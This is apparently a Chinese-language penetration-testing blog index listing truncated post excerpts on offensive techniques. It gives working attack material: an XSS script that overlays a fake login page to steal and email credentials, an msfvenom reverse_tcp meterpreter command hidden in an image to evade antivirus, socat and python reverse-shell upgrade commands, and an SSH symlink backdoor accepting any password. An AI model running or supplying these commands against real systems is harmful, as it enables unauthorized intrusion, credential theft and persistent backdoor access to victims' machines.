msf6之内网代理

msf以前的代理方式已经官方提示,如果你这么使用提示就会出现 也就是说20201229号就会移除这个代理模块,进而使用新的代理模块支持socks5代理 今天说一下,在meterpreter里面设置代理方法,进入对应的sessions后,执行 接下来,退出当前的sessions ,即backgroud后,在msf6命令行界面输入 以上说明运行成功,之后通过proxychains设置socks5代理,直接访问目标内网即可。

查看全部


Mac下保存https网站的ssl证书和输出证书详细信息

如果网站是https网站,你想把证书导出来,windows下直接查看证书导出就可以了。mac下更方便,直接拖拽证书到桌面即可。如下操作: 那么渗透过程中需要查看该证书下所有对应的DNS记录,例如这样 Mac想导出有点麻烦。但是一个命令可以查看该证书的所有信息,并复制DNS信息保存。 输出DNS复制即可。如下:

查看全部


利用xss钓指定登陆页面账号密码并发送到邮箱

1.新建一个xss.js文件,内容如下,放在服务器里便于调用 将这段js以xss方式插入到目标里,即<script src=”你服务器/xss.js”></script>简单说一下代码,插入目标之后,会新建一个cookie值,如果不存在这个值,就会创建一个iframe,这个iframe引用伪造的登陆页面并覆盖当前的后台页面,这就让其url地址不改变,不会让目标产生怀疑。而且这样的xss通过cookie设置,只执行一次,除非删了cookie qad值,才会反复执行xss。代码中https://xxx.xxx.xxx/login/target_login.html 设置成你钓鱼页面html地址,钓鱼页面伪造就直接用目标的登陆页面右击源码,直接复制保存到自己的web服务器里作为target_login.html文件保存,并修改html中js,css等资源为目标 […]

查看全部


shodan会员版命令行详细使用说明

使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run “shodan init <api key>” before using this command”导入key: root:~$ shodan init T1N3uP0Lyeq5w0wxxxxxxxxxxxxxxx 如果未安装则需要安装shodan root:~$ pip install shodan //安装 root:~$ pip install -U shodan //后续升级 正式进入命令详细说明之前,先用娱乐一下: curl parrot.live //丧的时候对着会舞动的终端发发呆还是可以的 curl wttr.in //终端版天气显示,”宅”心仁厚久了,出门还是有必要看一眼的 1.显示自己公网IP root: […]

查看全部


使用图片携带msf payload反弹绕过各种AV

#使用说明 1.先找一个高清大图片,四位数*四位数 那种以上的jpg或者png高清大图,命名为1.jpg ,低于四位数的高清大图会失败,一般图片大小,大于1M小于2M即可 。 2.使用msfvenom生成一个powershell的反弹的payload,一定要用64位的,32位的弹不出来●msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f psh-reflection > 1.ps1 3.使用Invoke-PSImage.ps1 把powershell 反弹的payload 压缩进高清大图里。操作如下:打开cmd,并执行powershell,之后再顺序执行以下命令●Import-Module .\Invoke-PSImage.ps1●Invoke-PSImage -Scr […]

查看全部


NC,bash反弹后非标准终端使用注意

一般在渗透过程中会反弹一个bash shell,但是此类反弹,命令行终端非正规的终端,键盘上下翻动无历史记录,vim编辑文件的时候,可能就会over。因为反弹出来的shell没有Sigint的,如果Ctrl+C,反弹出来的shell就会终止。这个日常操作过程中多少都会有人遇到过。然后往此反复重新反弹…. 1.可以弄一个伪终端,但是Ctrl+C还是会退出,但是显示效果和正式终端一样。 反弹成功后执行: python -c ‘import pty; pty.spawn(“/bin/bash”)’ 之后再 su 进入伪终端 2.使用socat反弹终端 监听机器执行: socat file:`tty`,raw,echo=0 tcp-listen:5555 靶机执行: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:xxx. […]

查看全部


ssh 软连接后门使用

通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下: ssh [email protected] -p 12345 注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root 上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字: echo ” #%PAM-1.0 auth       sufficient   pam_rootok.so auth & […]

查看全部